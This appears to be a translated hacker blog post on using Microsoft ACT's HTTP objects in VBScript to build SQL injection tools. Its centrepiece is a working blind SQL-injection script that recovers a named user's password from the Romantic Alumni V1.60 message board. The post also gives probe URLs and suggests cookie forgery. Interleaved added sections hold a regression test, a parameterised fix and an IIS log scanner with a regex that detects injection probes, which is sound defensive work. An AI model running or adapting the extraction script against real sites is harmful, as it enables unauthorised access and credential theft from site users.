Using VBS to write port-80 attack scripts such as SQL injection


Source: http://www.viphot.com/

Last night I was idly flipping through a VBS script on my machine and suddenly came across an object I had never seen before: Test.sendrequest("http://" & G_sserver & "/testfiles/browser.asp"). I had not seen the object, but its meaning was obvious: send an HTTP request. I assumed it was part of the WMI Scripting API, but I could not find the statement that created the object. Then I remembered Microsoft ACT, a site-testing tool that ships with Visual Studio .NET (long ago I wondered whether this would ever be useful; if not, why would they ship it?). I had opened it before but never studied how to use it, so I opened the help file (the MSDN entry is at ms-help://ms.vscc/ms.msdnvs.2052/act/htm/actml_main.htm) and skimmed it. It turns out to be a complete set of HTTP client objects (I am not sure that description is accurate). The objects and their members are listed below; this is the Test object model. There is also a Creator object model; if you are interested, see MSDN. I am still learning myself:

- Connection object
    Close method
    Send method
    IsOpen property
    Port property
    RedirectDepth property
    Server property
    UseSSL property

- Cookie object  // because this is a site-testing tool that uses a script to simulate many users, this lets you set each user's cookie; it could also be used for tampering, hehe
    Expires property
    Name property
    Path property
    Value property

- Cookies object
    Add method
    Remove method
    RemoveAll method
    Count property
    Item property

- Header object
    Name property
    Value property

- Request object
    Body property
    CodePage property
    EncodeBody property
    EncodeQueryAsUTF8 property
    Headers property
    HTTPVersion property
    Path property
    ResponseBufferSize property
    Verb property

- Response object
    Body property  // gets the text of the HTTP response; returns only the body part of the response buffer
    CodePage property
    BytesRecv property
    BytesSent property
    ContentLength property
    Headers property
    HeaderSize property
    HTTPVersion property
    Path property
    Port property
    ResultCode property  // the HTTP status code
    Server property
    TTFB property
    TTLB property
    UseSSL property

- Test object
    CreateConnection method
    CreateRequest method
    GetCurrentUser method
    GetGlobalIndex method
    GetGlobalVariable method
    GetNextUser method
    IncrementGlobalIndex method
    SendRequest method
    SetGlobalIndex method
    SetGlobalVariable method
    Sleep method
    Trace method
    TraceLevel property

- User object
    Cookies property
    Name property
    Password property

At this point you can probably think of many useful things: testing a site, testing a server, testing a program, cookie forgery ... it depends on your imagination. The first thing that interested me was the line I started from, Test.sendrequest("http://" & G_sserver & "/testfiles/browser.asp"). The help describes the SendRequest method of the Test object as:

    oResponse = Test.SendRequest(strURL)

Parameter: strURL As String: the URL to request

Return value: oResponse As Response: an object representing the web server's response to the request (that is, the Response object listed above)
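The same SendRequest/ResultCode pair is just as useful for checking that a page rejects the kind of input discussed later in this post. The following WSH script is an added example, not from the original post or the ACT documentation; it assumes ACT is installed, that the host and path are placeholders, and that a hypothetical fixed ShowThread.asp answers 400 to any RootID that is not a plain integer.

```vbscript
Option Explicit
' Assumptions: ACT is installed (as the post requires); the host and path are
' placeholders; ShowThread.asp has been fixed to answer 400 to a non-integer RootID.
Const BASE = "http://192.168.101.16/txl/ShowThread.asp?RootID="

' Each case: the RootID value to send and the HTTP status a fixed page should return.
' The 1=1 / 1=2 pair is the same probe the post uses; here it must not reach the database.
Dim cases
cases = Array( _
    Array("7", 200), _
    Array("7%20and%201=1", 400), _
    Array("7%20and%201=2", 400), _
    Array("7.0", 400), _
    Array("abc", 400))

Dim Test, c, resp, failures
Set Test = CreateObject("ACT.Test")
failures = 0
For Each c In cases
    ' SendRequest returns the Response object; ResultCode is its HTTP status code
    Set resp = Test.SendRequest(BASE & c(0))
    If resp.ResultCode <> c(1) Then
        failures = failures + 1
        WScript.Echo "FAIL RootID=" & c(0) & ": got " & resp.ResultCode & ", expected " & c(1)
    End If
Next
WScript.Echo "Done: " & failures & " failure(s) out of " & (UBound(cases) + 1) & " checks"
Set Test = Nothing
```

Run it after every change to the page; if the two boolean probes ever come back 200 again, the input check has regressed.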

This object makes it easy to write port-80 attack programs, such as the snow-tracing function and the now-popular SQL injection. Most SQL injection attack tools on the net are written in Perl, which I do not know, and writing a complete socket program in C is fairly cumbersome. This object gives VBS that possibility, and the resulting program is quite simple. It sacrifices efficiency, but for a rookie like me it is a good approach. Here is an example to illustrate:

Romantic Alumni is a free ASP alumni program. You may not have heard of it, but among free alumni web programs it is considered excellent, so many sites use it as-is or after modification (I have seen that my high school's alumni website uses a rewritten version of it). I have V1.60, downloaded from the internet last year; I am writing this in my dorm room without network access, so I cannot get the latest version. Anyway, it is just an example, so let's use it, hehe. Skimming the code I found many places that can be injected; the most obvious (because it is visible from the home page) is the forum-style message board showthread.asp:

    ...
    topicid = Request("RootID")
    sql = "Select Topic,hits from BBS where parentid=0 and bbsid=" & topicid
    Set rs = conn.execute(sql)
    ...

A very old and classic one, hehe. Try it:

    http://192.168.101.16/txl/ShowThread.asp?RootID=7%20and%201=1

    http://192.168.101.16/txl/ShowThread.asp?RootID=7%20and%201=2
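The root cause in showthread.asp is that RootID is pasted straight into the SQL text. The fragment below is an added example of a hardened version, not Romantic Alumni's own code; it assumes an open ADODB.Connection named conn (as the original snippet does) and the column names shown in that snippet, and it declares the ADO constants itself in case adovbs.inc is not included.

```vbscript
' Hardened ShowThread.asp fragment (added example; not Romantic Alumni's own code).
' Assumes an open ADODB.Connection named conn, as the original snippet does.
Option Explicit
' ADO constants, in case adovbs.inc is not included
Const adCmdText = 1
Const adInteger = 3
Const adParamInput = 1

Dim rawId, topicId, cmd, rs

' 1. Validate: RootID must be a plain integer of reasonable length.
rawId = Trim(Request("RootID") & "")
If Len(rawId) = 0 Or Len(rawId) > 9 Or Not IsNumeric(rawId) Then
    Response.Status = "400 Bad Request"
    Response.Write "Invalid RootID"
    Response.End
End If
' IsNumeric also accepts "7.0", "1e3" or "$7"; the round trip through CLng rejects them.
topicId = CLng(rawId)
If CStr(topicId) <> rawId Then
    Response.Status = "400 Bad Request"
    Response.End
End If

' 2. Parameterise: the id travels as a typed parameter, not as SQL text,
'    so "7 and 1=2" or "7 and exists(...)" can no longer alter the query.
Set cmd = Server.CreateObject("ADODB.Command")
Set cmd.ActiveConnection = conn
cmd.CommandType = adCmdText
cmd.CommandText = "SELECT Topic, Hits FROM BBS WHERE ParentID = 0 AND BBSID = ?"
cmd.Parameters.Append cmd.CreateParameter("@id", adInteger, adParamInput, , topicId)
Set rs = cmd.Execute

' 3. Render, HTML-encoding database text so stored content cannot inject markup.
Do Until rs.EOF
    Response.Write Server.HTMLEncode(rs("Topic") & "") & " (" & rs("Hits") & ")<br>"
    rs.MoveNext
Loop
rs.Close
Set rs = Nothing
Set cmd = Nothing
```

With this in place the two URLs above no longer return different pages; both are rejected before any SQL runs.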

I know the table structure, and user names can be seen in the user list, so this example shows how to guess a password. What, too easy? It is just an example, don't laugh ~~ Writing it was not plain sailing ~~ it is written very poorly, especially the loop: when the right character is detected it should exit the loop, but I could not think how (Break? Exit?). Still, it is enough for the passwords this program stores: a 6-character password took about 15 seconds to guess. With improvement it would get much faster, but the efficiency can never compare with Perl.

To use this object you must install Microsoft ACT, a tool in Visual Studio .NET. I tried to register the associated DLL directly with regsvr32 on another machine and failed, so it still has to be installed.

    '*********************************************
    ' Romantic Alumni V1.60 vulnerability test script by Luoluo
    ' Note: you need to install the ACT tool from Visual Studio .NET
    '*********************************************
    ' ********************************** optimized, higher efficiency
    Option Explicit
    On Error Resume Next

    Dim Test
    Dim o_response
    Dim wrong
    Dim i, j, k
    Dim pwd_len
    Dim pwd
    Dim strings
    Dim username

    ' The user name to crack, taken from the command line
    If WScript.Arguments.Count > 0 Then
        username = WScript.Arguments(0)
    Else
        username = "Luoluo"
    End If

    WScript.Echo "Start probing, please wait ..."

    ' The marker on the "correct" page; chosen at random, since all that matters
    ' is a part in which the two returned pages differ
    wrong = "Luoluoisachinesehacker"

    ' Stores the password recovered so far
    pwd = ""

    ' The character range of the password
    strings = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ"

    ' Set up the ACT Test object
    Set Test = CreateObject("ACT.Test")

    ' Find the length of the user's password
    For i = 0 To 128 Step 1
        ' Send a request and get back a Response object; the long URL is split
        ' into segments with & so it is easier to read
        Set o_response = Test.SendRequest("http://192.168.101.16/txl/ShowThread.asp?" & _
            "RootID=7%20and%20exists%20(select%20userid%20from%20student%20where%20len(userpwd)='" & i & _
            "'%20and%20userid='" & username & "')")
        ' If the returned page contains the "correct" marker, the length is right
        If InStr(o_response.Body, wrong) <> 0 Then
            pwd_len = "" & i & ""
            Exit For
        End If
    Next

    ' Guess the user's password one character at a time
    For j = 1 To pwd_len Step 1
        For k = 1 To Len(strings) Step 1
            Set o_response = Test.SendRequest("http://192.168.101.16/txl/ShowThread.asp?" & _
                "RootID=7%20and%20exists%20(select%20userid%20from%20student%20where%20left(userpwd," & j & ")='" & _
                pwd & Mid(strings, k, 1) & "'%20and%20userid='" & username & "')")
            If InStr(o_response.Body, wrong) <> 0 Then
                pwd = pwd & Mid(strings, k, 1)
                Exit For
            End If
        Next
    Next

    ' VBScript exposes errors through the Err object (there is no "Error" object)
    If Err Then
        WScript.Echo "Error: " & Err.Description
        Err.Clear
    Else
        ' Output the password
        WScript.Echo "Password: " & pwd
    End If

    Set Test = Nothing
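Probing like this leaves a distinctive trail in the IIS log: one client sending many requests to the same .asp with "and", "exists(", "len(" or "left(" inside a parameter that should only ever hold a number. The WSH script below is an added example, not part of the original post; the log lines are constructed in IIS W3C extended format (not a real log), and the column positions are resolved from the #Fields header rather than assumed.

```vbscript
Option Explicit

' Constructed sample in IIS W3C extended format (not a real log); IIS writes the
' query string URL-encoded, with any literal spaces replaced by "+".
Dim sampleLog
sampleLog = "#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status" & vbCrLf & _
    "2003-11-02 21:14:05 192.168.101.7 GET /txl/ShowThread.asp RootID=7 200" & vbCrLf & _
    "2003-11-02 21:14:09 192.168.101.9 GET /txl/ShowThread.asp RootID=7%20and%201=1 200" & vbCrLf & _
    "2003-11-02 21:14:10 192.168.101.9 GET /txl/ShowThread.asp RootID=7%20and%201=2 200" & vbCrLf & _
    "2003-11-02 21:14:12 192.168.101.9 GET /txl/ShowThread.asp RootID=7%20and%20exists%20(select%20userid%20from%20student%20where%20len(userpwd)='6'%20and%20userid='Luoluo') 200" & vbCrLf & _
    "2003-11-02 21:14:13 192.168.101.9 GET /txl/ShowThread.asp RootID=7%20and%20exists%20(select%20userid%20from%20student%20where%20left(userpwd,1)='A'%20and%20userid='Luoluo') 200" & vbCrLf & _
    "2003-11-02 21:15:01 192.168.101.12 GET /txl/Default.asp - 200"

' Boolean/blind-injection probes in a parameter that should hold an integer:
' "and 1=1", "and exists(", "and len(", "and left(" with space, + or %20 separators.
Dim re
Set re = New RegExp
re.IgnoreCase = True
re.Pattern = "(%20|\+|\s)(and|or)(%20|\+|\s)+(\d+\s*=\s*\d+|exists(%20|\+|\s)*\(|len\(|left\()"

Dim ipIdx, queryIdx, hits, line, parts, fields, i
Set hits = CreateObject("Scripting.Dictionary")   ' c-ip -> number of probe requests

For Each line In Split(sampleLog, vbCrLf)
    If Left(line, 8) = "#Fields:" Then
        ' Resolve column positions from the header instead of hard-coding them
        fields = Split(Trim(Mid(line, 9)), " ")
        For i = 0 To UBound(fields)
            If fields(i) = "c-ip" Then ipIdx = i
            If fields(i) = "cs-uri-query" Then queryIdx = i
        Next
    ElseIf Left(line, 1) <> "#" And Len(line) > 0 Then
        parts = Split(line, " ")
        If re.Test(parts(queryIdx)) Then
            If Not hits.Exists(parts(ipIdx)) Then hits.Add parts(ipIdx), 0
            hits(parts(ipIdx)) = hits(parts(ipIdx)) + 1
        End If
    End If
Next

Dim ip
For Each ip In hits.Keys
    WScript.Echo ip & ": " & hits(ip) & " request(s) with SQL probes in the query string"
Next
```

On the sample it reports 192.168.101.9 with 4 probe requests and nothing for the other two clients; pointing the same loop at a real ex*.log file with FileSystemObject instead of the inline string is the only change needed.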
